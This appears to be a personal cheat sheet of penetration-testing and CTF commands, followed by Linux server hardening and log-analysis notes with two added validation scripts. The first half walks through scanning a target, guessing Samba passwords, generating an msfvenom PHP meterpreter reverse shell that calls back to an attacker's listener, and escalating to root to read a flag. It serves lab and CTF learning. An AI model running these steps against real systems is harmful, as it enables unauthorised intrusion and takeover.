Scanning for the target IP
ifconfig (first get your own IP)
netdiscover -r 192.168.0.1/24 (scan IPs 1 ~ 124 in the range)
after getting the target IP:
nmap -sV 192.168.0.104 (service/version scan)
nmap -v -A -T4 192.168.0.104 (TCP port scan)
Ports:
22: SSH
21: FTP
23: Telnet
80: HTTP
443: HTTPS
3306: MySQL
if the Samba service is open:
smbclient -L 192.168.0.104 (list the shares)
smbclient '\\192.168.0.104\print$' (enter the print$ share)
(try them one by one) (weak-password guessing)
after getting in:
get a.txt (download the a.txt file)
mysql -h 192.168.0.104 -u admin -p (database connection)
(password) (the password may be hidden in a file)
searchsploit Samba smbd 3.x - 4.x (search for known exploits)
dirb http://192.168.0.104 (web directory scan)
enter the site
log in as admin
use msf to set up the payload:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
show options (view the settings)
set lhost <ip>
set lport <port>
run (listen)
msfvenom -p php/meterpreter/reverse_tcp lhost=<ip> lport=<port> -f raw
(generate the php shell)
copy and paste the shell into a php page, then find a way to trigger it: accessing that php page triggers the vulnerability
after a successful trigger:
a shell inside msf
privilege escalation:
id (see the current user's uid)
python -c "import pty; pty.spawn('/bin/bash')" (spawn a proper tty shell)
cat /etc/passwd (list the users)
su <user> (find that user's password)
sudo -l (list the sudo privileges)
sudo su
find the flag, usually /root/proot.txt
cat proot.txt
submit the flag!
SSH operations
ssh [-p port] username@IP
scp <file path> username@IP:<storage path> // transfer a file to the ssh server
back up the web directory
tar -zcvf web.tar.gz /var/www/html/
user management
w // view the currently logged-in users
pkill -kill -t <user tty> // kick a currently logged-in user
process management
ps aux | grep <pid or process name> // view a process
view established network connections and their processes
netstat -antulp | grep EST
see which process occupies a given port
lsof -i:<port> or netstat -tunlp | grep <port>
end a process
kill <PID>
killall <process name>
kill -9 <PID>
iptables commands
block an IP or an IP range, e.g. 123.4.5.6
iptables -I INPUT -s 123.4.5.6 -j DROP
iptables -I INPUT -s 123.4.5.1/24 -j DROP
forbid ssh logins to this machine from a remote host, e.g. 123.4.5.6
iptables -t filter -A INPUT -s 123.4.5.6 -p tcp --dport 22 -j DROP
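The two DROP rules above, wrapped in small shell functions that check the address argument before it is handed to iptables, so a malformed or tampered value (for example a string carrying extra options) is refused instead of becoming part of a firewall command. This is an added example, not from the original notes; IPTABLES_DRY_RUN is an assumed convention of this script, not an iptables option, and it defaults to printing the command so the logic can be exercised without root.

```shell
#!/bin/sh
# Added example (not from the original notes): validate an IPv4 address or CIDR
# before building the iptables DROP rules listed above.
# IPTABLES_DRY_RUN is our own assumed switch: 1 (default) prints the command,
# 0 executes it (requires root).
IPTABLES_DRY_RUN=${IPTABLES_DRY_RUN:-1}

# Return 0 if $1 is a.b.c.d or a.b.c.d/nn with each octet 0-255 and prefix 0-32.
valid_ipv4_cidr() {
  case "$1" in
    */*) addr=${1%/*}; prefix=${1#*/} ;;
    *)   addr=$1;      prefix=32 ;;
  esac
  case "$prefix" in ''|*[!0-9]*) return 1 ;; esac
  [ "$prefix" -le 32 ] || return 1
  # Split on dots without globbing; empty or non-numeric pieces fail.
  old_ifs=$IFS; IFS=.; set -f; set -- $addr; set +f; IFS=$old_ifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    case "$octet" in ''|*[!0-9]*) return 1 ;; esac
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Print the rule in dry-run mode, otherwise execute it.
run_rule() {
  if [ "$IPTABLES_DRY_RUN" = 1 ]; then
    printf '%s\n' "$*"
  else
    "$@"
  fi
}

# Drop all traffic from one host or network (the notes' -I INPUT ... -j DROP).
block_source() {
  valid_ipv4_cidr "$1" || { echo "refusing invalid address: $1" >&2; return 2; }
  run_rule iptables -I INPUT -s "$1" -j DROP
}

# Drop only ssh (tcp/22) from one host, leaving its other traffic alone.
block_ssh_from() {
  valid_ipv4_cidr "$1" || { echo "refusing invalid address: $1" >&2; return 2; }
  run_rule iptables -t filter -A INPUT -s "$1" -p tcp --dport 22 -j DROP
}

# Demonstration (dry run by default; run with IPTABLES_DRY_RUN=0 as root to apply):
block_source 123.4.5.6
block_source 123.4.5.0/24
block_ssh_from 123.4.5.6
block_source "123.4.5.6 -j ACCEPT"   # refused: not a bare address
```

Rules inserted with -I land at the top of INPUT, so they take effect before any ACCEPT rule already present; append with -A when an earlier rule is meant to win.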
mysql database operations
back up a mysql database
mysqldump -u <username> -p<password> <database name> > bak.sql // back up the specified database
mysqldump --all-databases > bak.sql // back up all databases
restore a mysql database
mysql -u <username> -p<password> <database name> < bak.sql
security check
find / -name "*.php" -perm 4777 // find php files with mode 4777 (setuid and world-writable)
awk -F: '{if ($3 == 0) print $1}' /etc/passwd // list accounts with root (uid 0) privileges
crontab -l // view scheduled tasks
count the connections in each tcp state
netstat -ant | awk '{print $5 "\t" $6}' | grep "[1-9][0-9]*\." | sed -e 's/::ffff://' -e 's/:[0-9]*//' | sort | uniq -c | sort -rn
view the top ten IPs by page views
cat /var/log/apache2/access.log | cut -f1 -d " " | sort | uniq -c | sort -k 1 -r | head -10
view the top ten URLs by page views
cat /var/log/apache2/access.log | cut -f7 -d " " | sort | uniq -c | sort -k 1 -r | head -10 // the request path is field 7 of the combined log format
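The uid-0 and access-log checks above, written as shell functions over a constructed sample so the field positions can be verified before the one-liners are run against the real /etc/passwd and /var/log/apache2/access.log. This is an added example, not part of the original notes; the log lines and passwd entries are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original notes): the "security check" one-liners as
# functions, exercised on constructed sample data.

# Constructed sample in Apache combined log format. The user agents contain
# spaces, which is why only the leading whitespace-separated fields are stable.
sample_access_log() {
  cat <<'EOF'
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /login.php HTTP/1.1" 200 734 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [10/Oct/2023:13:55:38 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "curl/7.88.1"
10.0.0.5 - - [10/Oct/2023:13:55:39 +0000] "GET /admin/ HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /login.php HTTP/1.1" 200 734 "-" "python-requests/2.31"
EOF
}

# Constructed passwd-format sample with one extra uid-0 account.
sample_passwd() {
  cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backdoor:x:0:0::/tmp:/bin/sh
EOF
}

# Top-N client IPs by request count, read from stdin. Field 1 is the client.
top_ips() {
  awk '{ c[$1]++ } END { for (k in c) print c[k], k }' | sort -rn -k1,1 | head -n "${1:-10}"
}

# Top-N requested paths, read from stdin. Fields: $1 ip, $2 ident, $3 user,
# $4 [date, $5 tz], $6 "METHOD, $7 path. Field 4 would only give the timestamp.
top_urls() {
  awk '{ c[$7]++ } END { for (k in c) print c[k], k }' | sort -rn -k1,1 | head -n "${1:-10}"
}

# Accounts with uid 0 from a passwd-format file (argument) or stdin.
# Anything besides root here needs an explanation.
uid0_accounts() {
  awk -F: '$3 == 0 { print $1 }' "$@"
}

# Demonstration on the constructed samples; on a real host pipe in the real files.
echo "top clients:";   sample_access_log | top_ips 3
echo "top paths:";     sample_access_log | top_urls 3
echo "uid 0 accounts:"; sample_passwd | uid0_accounts
```

Counting inside awk instead of sort | uniq -c keeps the output format fixed (count, then key), which makes the result easy to compare across hosts or feed into an alert.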
gather brief information about a site
curl --head <site>
xprobe2 -v <site>
nmap options:
-A show detailed version information
-v show verbose output
-O detect the operating system
Maltego
Web vulnerability discovery (http scanning)
webshag
w3af (a powerful professional tool)
OWASP ZAP, a web scanning tool equivalent to w3af
injection tool
sqlmap
SEToolkit (a very powerful tool)